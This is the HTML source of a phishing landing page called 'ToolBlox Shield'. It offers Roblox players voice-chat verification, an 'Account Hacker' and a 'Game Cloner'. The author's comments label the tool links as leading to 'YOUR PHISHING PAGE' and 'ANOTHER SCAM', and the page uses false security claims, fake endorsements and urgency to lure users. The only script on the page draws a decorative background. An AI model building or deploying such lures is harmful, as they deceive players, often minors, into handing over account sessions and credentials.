<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Unlock the FULL Roblox Experience!</title> <!-- Catchy Title -->
    <link rel="stylesheet" href="landing_style.css">
    <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;600;700&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" integrity="sha512-9usAa10IRO0HhonpyAIVpjrylPvoDwiPUiKdWk5t3PyolY1cOd4DSE0Ga+ri4AuTroPR5aQvXU9xC6qOPnzFeg==" crossorigin="anonymous" referrerpolicy="no-referrer" /> <!-- Font Awesome -->
</head>
<body>
    <!-- Particle background -->
    <div id="particles-js"></div> 

    <!-- Optional: Simple Header/Logo Area -->
    <header class="landing-header">
        <img src="weblogo.png" alt="Apex Suite Logo" class="logo"> <!-- Add a fake logo image -->
        <span>ToolBlox Shield</span>
        <nav class="header-nav"> <!-- Navigation container -->
            <a href="faq.html" class="nav-link">FAQ</a>
            <a href="how-it-works.html" class="nav-link">How It Works</a>
            <a href="contact.html" class="nav-link">Contact</a>
        </nav>
        <a href="https://discord.gg/zxWNcD4GVv" target="_blank" class="discord-icon-link"> <!-- Add Discord Icon Link -->
            <i class="fab fa-discord"></i>
        </a>
    </header>

    <main class="content-wrapper">
        <!-- Hero Section -->
        <section class="hero-section floating-soft">
            <h1>Unlock the <span class="highlight">FULL</span> Roblox Experience!</h1>
            <p class="subtitle">Gain the edge & verify Voice Chat with our cutting-edge, secure tools used by elite players!</p>
            <a href="#tools" class="cta-button primary">Explore Tools Now!</a>
        </section>

        <!-- Problem Section -->
        <section class="info-section floating-soft delay-1">
             <img src="vc.png" alt="Limited Access" class="section-icon"> <!-- Placeholder image -->
            <h2>Feeling Left Behind?</h2>
            <p>Stuck without Voice Chat? Missing out on rare items? The normal Roblox grind is slow and unfair. Don't you deserve more?</p>
        </section>

        <!-- Solution Section (Tools) -->
        <section id="tools" class="tools-section">
            <h2>You can use ToolBlox Shield with confidence, knowing that we prioritize your account's security and privacy above all else.</h2>
            <div class="tool-card floating-soft delay-2">
                <img src="vc.png" alt="VC Verify Icon" class="tool-icon"> <!-- Placeholder image -->
                <h3>VC SecureVerify</h3>
                <p>Instantly grant eligible accounts Voice Chat using official Roblox session protocols! Fast, safe, and requires just one simple verification step. Stop missing out!</p>
                <a href="vc.html" class="cta-button secondary">Verify VC Access</a> <!-- LINK TO YOUR PHISHING PAGE -->
            </div>
            <div class="tool-card floating-soft delay-3">
                 <img src="logo (2).png" alt="Project Apex Icon" class="tool-icon"> <!-- Placeholder image -->
                <h3>Account Hacker</h3>
                <p>Our advanced account utility. Safely recover *your* old accounts or perform security audits. Uses encrypted, industry-standard methods for maximum safety. Take control!</p>
                <a href="acchek.html" class="cta-button secondary">Acc Hacker Utilities</a> <!-- LINK TO ANOTHER SCAM OR SAME PHISHING PAGE -->
            </div>
            <div class="tool-card floating-soft delay-2">
                <img src="gamecopy.png" alt="VC Verify Icon" class="tool-icon"> <!-- Placeholder image -->
                <h3>Game Cloner</h3>
                <p>Clone any Roblox game instantly using real Roblox session protocols! Fast, reliable, and secure—just one simple step to duplicate full experiences. No lag, no limits—copy like a pro and take control of your creations!</p>
                <a href="gamecopyer.html" class="cta-button secondary">Game Cloner</a> <!-- LINK TO YOUR PHISHING PAGE -->
            </div>
        </section>

        <!-- Trust Section -->
        <section class="trust-section floating-soft delay-4">
            <h2>Why Trust Us? Security & Simplicity First!</h2>
            <ul>
                <li>✅ <strong>100% Secure:</strong> Uses encrypted connections & official methods.</li>
                <li>✅ <strong>Easy to Use:</strong> Simple step-by-step instructions.</li>
                <li>✅ <strong>Instant Results:</strong> Verify or access tools immediately.</li>
                <li>✅ <strong>Elite User Approved:</strong> Join thousands of top players.</li>
                <li>🔥 <strong>Limited Time Offer:</strong> Free access ending soon!</li>
            </ul>
        </section>

        <!-- Final Call to Action -->
         <section class="final-cta floating-soft delay-5">
             <h2>Ready to Unlock Your Potential?</h2>
             <p>Choose your tool above and follow the simple steps. Your upgraded Roblox experience awaits!</p>
             <a href="#tools" class="cta-button primary large">Get Started Now!</a>
         </section>
    </main>

    <footer class="landing-footer">
        © 2025 ToolBlox Shield | For educational/recovery purposes only. Use responsibly. Not affiliated with Roblox Corporation.
    </footer>

    <!-- Particle Library & Config -->
    <script src="https://cdn.jsdelivr.net/npm/particles.js@2.0.0/particles.min.js"></script>
    <script>
        // Standard Green Particle Config
        particlesJS("particles-js", {
          "particles": { "number": { "value": 80, "density": { "enable": true, "value_area": 800 } }, "color": { "value": "#00ff00" }, "shape": { "type": "circle" }, "opacity": { "value": 0.5, "random": true, "anim": { "enable": true, "speed": 0.4, "opacity_min": 0.1, "sync": false } }, "size": { "value": 3, "random": true }, "line_linked": { "enable": true, "distance": 150, "color": "#00ff00", "opacity": 0.2, "width": 1 }, "move": { "enable": true, "speed": 1, "direction": "none", "random": true, "straight": false, "out_mode": "out", "bounce": false } },
          "interactivity": { "detect_on": "canvas", "events": { "onhover": { "enable": true, "mode": "grab" }, "onclick": { "enable": true, "mode": "push" }, "resize": true }, "modes": { "grab": { "distance": 140, "line_opacity": 0.4 }, "push": { "particles_nb": 3 } } },
          "retina_detect": true
        });
    </script>
</body>
</html>
